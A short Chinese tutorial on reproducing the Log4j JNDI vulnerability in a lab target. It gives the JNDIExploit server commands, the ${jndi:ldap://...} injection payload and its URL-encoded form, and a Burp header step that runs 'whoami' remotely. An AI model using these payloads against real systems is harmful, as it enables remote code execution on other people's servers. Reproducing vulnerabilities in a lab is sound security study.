JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
kk哥889911 分钟前
C++ 对象 核心介绍
java·jvm·c++
招风的黑耳21 分钟前
我用SpringBoot撸了一个智慧水务监控平台
java·spring boot·后端
xunyan623421 分钟前
面向对象(下)-接口的理解
java·开发语言
程序员游老板25 分钟前
基于SpringBoot3+vue3的爱心陪诊平台
java·spring boot·毕业设计·软件工程·课程设计·信息与通信
期待のcode27 分钟前
Springboot核心构建插件
java·spring boot·后端
遥不可及~~斌30 分钟前
Java 面试题集 -- 001
java·开发语言
C182981825751 小时前
HttpURLConnection 与其他客户端关系
java
通往曙光的路上1 小时前
发邮件1、创建邮箱
java
麦麦鸡腿堡2 小时前
Java_类的加载
java·开发语言
JIngJaneIL2 小时前
基于java + vue校园快递物流管理系统(源码+数据库+文档)
java·开发语言·前端·数据库·vue.js